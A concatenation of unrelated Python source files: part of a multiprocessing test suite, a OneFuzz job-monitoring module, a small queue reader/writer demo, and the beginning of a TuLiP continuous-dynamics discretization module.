self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['spawn', 'fork'] or
methods == ['fork', 'spawn', 'forkserver'] or
methods == ['spawn', 'fork', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def _test_resource_tracker(self):
#
# Check that killing process does not leak named semaphores
#
cmd = '''if 1:
import time, os, tempfile
import multiprocess as mp
from multiprocess import resource_tracker
from multiprocess.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = ('resource_tracker: There appear to be 2 leaked {} '
'objects'.format(
rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocess.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
support.wait_process(pid, exitcode=-signal.SIGKILL)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocess.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
# The pid should be None in the child process, expect for the fork
# context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocess.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
def test_close(self):
queue = multiprocessing.SimpleQueue()
queue.close()
# closing a queue twice should not fail
queue.close()
# Test specific to CPython since it tests private attributes
@test.support.cpython_only
def test_closed(self):
queue = multiprocessing.SimpleQueue()
queue.close()
self.assertTrue(queue._reader.closed)
self.assertTrue(queue._writer.closed)
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
@hashlib_helper.requires_hashdigest('md5')
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocess.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in not_exported are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
not_exported=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocess.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
support.print_warning('Shared objects which still exist '
'at manager shutdown:')
support.print_warning(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
if type_ == 'manager':
Temp = hashlib_helper.requires_hashdigest('md5')(Temp)
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
top.py
|
#!/usr/bin/env python
#
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import logging
import time
from queue import PriorityQueue
from threading import Thread
from typing import Any, Optional
from .cache import JobFilter, TopCache
from .signalr import Stream
from .top_view import render
def background_task(queue: PriorityQueue) -> None:
while True:
(_, entry) = queue.get(block=True)
if entry is None:
queue.task_done()
return
(cmd, args) = entry
cmd(*args)
queue.task_done()
class Top:
def __init__(
self,
onefuzz: "Onefuzz",
logger: logging.Logger,
job_filter: JobFilter,
):
self.onefuzz = onefuzz
self.logger = logger
self.cache = TopCache(onefuzz, job_filter)
self.queue: PriorityQueue = PriorityQueue()
self.worker = Thread(target=background_task, args=(self.queue,))
self.worker.start()
def add_container(self, name: str) -> None:
if name in self.cache.files:
return
self.queue.put((2, (self.cache.add_container, [name])))
def handler(self, message: Any) -> None:
for event_raw in message:
self.cache.add_message(event_raw)
def setup(self) -> Stream:
client = Stream(self.onefuzz, self.logger)
client.setup(self.handler)
self.logger.info("getting initial data")
pools = self.onefuzz.pools.list()
for pool in pools:
self.cache.add_pool(pool)
for job in self.onefuzz.jobs.list():
mini_job = self.cache.add_job(job)
# don't add pre-add tasks that we're going to filter out
if not self.cache.should_render_job(mini_job):
continue
for task in self.onefuzz.tasks.list(job_id=job.job_id):
self.cache.add_task(task)
for container in task.config.containers:
self.add_container(container.name)
nodes = self.onefuzz.nodes.list()
for node in nodes:
self.cache.add_node(node)
if client.connected is None:
self.logger.info("waiting for signalr connection")
while client.connected is None:
time.sleep(1)
return client
def run(self) -> None:
try:
client = self.setup()
except Exception as err:
self.queue.put((1, None))
raise err
error: Optional[Exception] = None
try:
self.logger.info("rendering")
render(self.cache)
client.stop()
except Exception as err:
error = err
self.queue.put((1, None))
if error is not None:
raise error
from ..api import Onefuzz # noqa: E402
|
queue_m1.py
|
from collections import namedtuple
import multiprocessing as mp
import random
import time
VALUES = (100, 200, 500, 1000)
Coin = namedtuple('Coin', ['value'])
def reader(queue):
termination_threshold = 25
termination_count = 0
reader_sum = 0
while termination_count < termination_threshold:
if queue.empty():
print("[Process {}] Waiting for new items...".format(
mp.current_process().name))
time.sleep(random.random() * 0.50)
termination_count += 1
else:
termination_count = 0
coin = queue.get()
reader_sum += coin.value
time.sleep(random.random() * 0.50)
print("[Process {}] Read coin ({})".format(
mp.current_process().name, str(coin.value)))
print("[Process {}] Total value read: {}".format(
mp.current_process().name, reader_sum))
print("[Process {}] Exiting...".format(mp.current_process().name))
def writer(count, queue):
writer_sum = 0
for ii in range(count):
coin = Coin(random.choice(VALUES))
queue.put(coin)
writer_sum += coin.value
# No need to prepend string with process name since this
# function is executed in main interpreter thread
print("Put coin ({}) into queue".format(coin.value))
time.sleep(random.random() * 0.50)
print('Total value written: ' + str(writer_sum))
if __name__ == '__main__':
start_time = time.time()
count = 100
queue = mp.Queue() # Queue class from multiprocessing module
reader_p1 = mp.Process(target=reader, name='Reader 1', args=(queue,))
reader_p1.daemon = True
reader_p1.start()
writer(count, queue)
reader_p1.join()
end_time = time.time()
print('Total running time: ' + str(end_time - start_time))
|
discretization.py
|
# Copyright (c) 2011-2016 by California Institute of Technology
# Copyright (c) 2016 by The Regents of the University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder(s) nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
"""
Algorithms related to discretization of continuous dynamics.
See Also
========
L{find_controller}
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
logger = logging.getLogger(__name__)
import os
import warnings
import pprint
from copy import deepcopy
import multiprocessing as mp
import numpy as np
from scipy import sparse as sp
import polytope as pc
from polytope.plot import plot_partition, plot_transition_arrow
from tulip import transys as trs
from tulip.hybrid import LtiSysDyn, PwaSysDyn
from .prop2partition import (PropPreservingPartition,
pwa_partition, part2convex)
from .feasible import is_feasible, solve_feasible
from .plot import plot_ts_on_partition
# inline imports:
#
# inline: import matplotlib.pyplot as plt
debug = False
class AbstractSwitched(object):
"""Abstraction of SwitchedSysDyn, with mode-specific and common info.
Attributes:
- ppp: merged partition, if any
Preserves both propositions and dynamics
- ts: common TS, if any
- ppp2ts: map from C{ppp.regions} to C{ts.states}
- modes: dict of {mode: AbstractPwa}
- ppp2modes: map from C{ppp.regions} to C{modes[mode].ppp.regions}
of the form:
{mode: list}
where C{list} has same indices as C{ppp.regions} and
elements in each C{list} are indices of regions in
each C{modes[mode].ppp.regions}.
type: dict
Each partition corresponds to some mode.
(for switched systems)
In each mode a L{PwaSysDyn} is active.
"""
def __init__(
self, ppp=None, ts=None, ppp2ts=None,
modes=None, ppp2modes=None
):
if modes is None:
modes = dict()
self.ppp = ppp
self.ts = ts
self.ppp2ts = ppp2ts
self.modes = modes
self.ppp2modes = ppp2modes
def __str__(self):
s = 'Abstraction of switched system\n'
s += str('common PPP:\n') + str(self.ppp)
s += str('common ts:\n') + str(self.ts)
for mode, ab in self.modes.items():
s += 'mode: ' + str(mode)
s += ', with abstraction:\n' + str(ab)
return s
def ppp2pwa(self, mode, i):
"""Return original C{Region} containing C{Region} C{i} in C{mode}.
@param mode: key of C{modes}
@param i: Region index in common partition C{ppp.regions}.
@return: tuple C{(j, region)} of:
- index C{j} of C{Region} and
- C{Region} object
in C{modes[mode].ppp.regions}
"""
region_idx = self.ppp2modes[mode][i]
ab = self.modes[mode]
return ab.ppp2pwa(region_idx)
def ppp2sys(self, mode, i):
"""Return index of active PWA subsystem in C{mode},
@param mode: key of C{modes}
@param i: Region index in common partition C{ppp.regions}.
@return: tuple C{(j, subsystem)} of:
- index C{j} of PWA C{subsystem}
- L{LtiSysDyn} object C{subsystem}
"""
region_idx = self.ppp2modes[mode][i]
ab = self.modes[mode]
return ab.ppp2sys(region_idx)
def plot(self, show_ts=False, only_adjacent=False):
"""Plot mode partitions and merged partition, if one exists.
For details see L{AbstractPwa.plot}.
"""
axs = []
color_seed = 0
# merged partition exists ?
if self.ppp is not None:
for mode in self.modes:
env_mode, sys_mode = mode
edge_label = {'env_actions':env_mode,
'sys_actions':sys_mode}
ax = _plot_abstraction(
self, show_ts=False, only_adjacent=False,
color_seed=color_seed
)
plot_ts_on_partition(
self.ppp, self.ts, self.ppp2ts,
edge_label, only_adjacent, ax
)
axs += [ax]
# plot mode partitions
for mode, ab in self.modes.items():
ax = ab.plot(show_ts, only_adjacent, color_seed)
ax.set_title('Abstraction for mode: ' + str(mode))
axs += [ax]
#if isinstance(self.ts, dict):
# for ts in self.ts:
# ax = ts.plot()
# axs += [ax]
return axs
class AbstractPwa(object):
"""Discrete abstraction of PWA dynamics, with attributes:
- ppp: Partition into Regions.
Each Region corresponds to
a discrete state of the abstraction
type: L{PropPreservingPartition}
- ts: Finite transition system abstracting the continuous system.
Each state corresponds to a Region in C{ppp.regions}.
It can be fed into discrete synthesis algorithms.
type: L{FTS}
- ppp2ts: bijection between C{ppp.regions} and C{ts.states}.
Has common indices with C{ppp.regions}.
Elements are states in C{ts.states}.
(usually each state is a str)
type: list of states
- pwa: system dynamics
type: L{PwaSysDyn}
- pwa_ppp: partition preserving both:
- propositions and
- domains of PWA subsystems
Used for non-conservative planning.
If just L{LtiSysDyn}, then the only difference
of C{pwa_ppp} from C{orig_ppp} is convexification.
type: L{PropPreservingPartition}
- orig_ppp: partition preserving only propositions
